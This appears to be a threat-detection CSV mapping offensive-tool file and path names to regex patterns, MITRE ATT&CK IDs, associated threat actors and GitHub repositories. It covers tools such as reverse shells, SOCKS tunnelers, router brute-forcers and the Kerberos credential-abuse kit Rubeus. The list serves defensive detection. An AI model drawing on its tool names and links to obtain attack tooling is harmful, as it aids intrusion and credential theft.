"*/rootkiter/Binary-files*",".{0,1000}\/rootkiter\/Binary\-files.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","10514"
"*/rop_emporium*",".{0,1000}\/rop_emporium.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","10515"
"*/ropbuffers.go*",".{0,1000}\/ropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10516"
"*/ropfuscator*",".{0,1000}\/ropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","10517"
"*/rotateproxy.exe*",".{0,1000}\/rotateproxy\.exe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10518"
"*/rotateproxy.git*",".{0,1000}\/rotateproxy\.git.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10519"
"*/rotateproxy.service*",".{0,1000}\/rotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10520"
"*/rotateproxy/releases/*",".{0,1000}\/rotateproxy\/releases\/.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10521"
"*/rotateproxy_*.zip*",".{0,1000}\/rotateproxy_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10522"
"*/rotateproxy-darwin-*",".{0,1000}\/rotateproxy\-darwin\-.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10523"
"*/rotateproxy-linux*",".{0,1000}\/rotateproxy\-linux.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10524"
"*/rotateproxy-windows*",".{0,1000}\/rotateproxy\-windows.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10525"
"*/rottenpotato*",".{0,1000}\/rottenpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Turla - Volatile Cedar - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10526"
"*/RottenPotatoNG.git*",".{0,1000}\/RottenPotatoNG\.git.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","10527"
"*/Rottie3.exe*",".{0,1000}\/Rottie3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10528"
"*/Routerscan.7z*",".{0,1000}\/Routerscan\.7z.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10529"
"*/RouterScan.exe*",".{0,1000}\/RouterScan\.exe.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10530"
"*/router-scan.git*",".{0,1000}\/router\-scan\.git.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10531"
"*/RouterScan.log*",".{0,1000}\/RouterScan\.log.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10532"
"*/rpc/rpcproxy.dll?*",".{0,1000}\/rpc\/rpcproxy\.dll\?.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10533"
"*/rpcap-brute.nse*",".{0,1000}\/rpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10534"
"*/rpcap-info.nse*",".{0,1000}\/rpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10535"
"*/RPC-Backdoor.git*",".{0,1000}\/RPC\-Backdoor\.git.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10536"
"*/RPC-Backdoor_v1.0.7z*",".{0,1000}\/RPC\-Backdoor_v1\.0\.7z.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10537"
"*/RPC-Backdoor_v1.0.zip*",".{0,1000}\/RPC\-Backdoor_v1\.0\.zip.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10538"
"*/rpcbomb.rb*",".{0,1000}\/rpcbomb\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10539"
"*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","10542"
"*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10543"
"*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","10544"
"*/rpc-grind.nse*",".{0,1000}\/rpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10546"
"*/rpcinfo.nse*",".{0,1000}\/rpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10547"
"*/rpcmap.py*",".{0,1000}\/rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10548"
"*/rpcrt.py *",".{0,1000}\/rpcrt\.py\s.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","0","#linux","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","10551"
"*/rpivot.git*",".{0,1000}\/rpivot\.git.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","10552"
"*/rsa-vuln-roca.nse*",".{0,1000}\/rsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10553"
"*/rservices_from_users.txt*",".{0,1000}\/rservices_from_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10555"
"*/rsockstun *",".{0,1000}\/rsockstun\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","#linux","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","10562"
"*/rsockstun.git*",".{0,1000}\/rsockstun\.git.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","10563"
"*/rsocx-*-linux-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-linux\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","#linux","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10564"
"*/rsocx-*-windows-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-windows\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10565"
"*/rsocx.exe*",".{0,1000}\/rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10566"
"*/rsocx.git",".{0,1000}\/rsocx\.git","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10567"
"*/rsocx/releases/download/*",".{0,1000}\/rsocx\/releases\/download\/.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10568"
"*/rs-shell.exe*",".{0,1000}\/rs\-shell\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10569"
"*/rs-shell.git*",".{0,1000}\/rs\-shell\.git.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10570"
"*/rs-shell/zipball/*",".{0,1000}\/rs\-shell\/zipball\/.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10571"
"*/rs-shell-linux *",".{0,1000}\/rs\-shell\-linux\s.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#linux","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10572"
"*/rs-shell-windows.exe*",".{0,1000}\/rs\-shell\-windows\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10573"
"*/rsync-brute.nse*",".{0,1000}\/rsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10574"
"*/rsync-list-files.py*",".{0,1000}\/rsync\-list\-files\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","10575"
"*/rsync-list-modules.nse*",".{0,1000}\/rsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10576"
"*/rt_hijacking.exe*",".{0,1000}\/rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10577"
"*/rtsp-methods.nse*",".{0,1000}\/rtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10578"
"*/rtsp-url-brute.nse*",".{0,1000}\/rtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10579"
"*/Rubeus*",".{0,1000}\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10590"
"*/Rubeus.dll*",".{0,1000}\/Rubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10591"
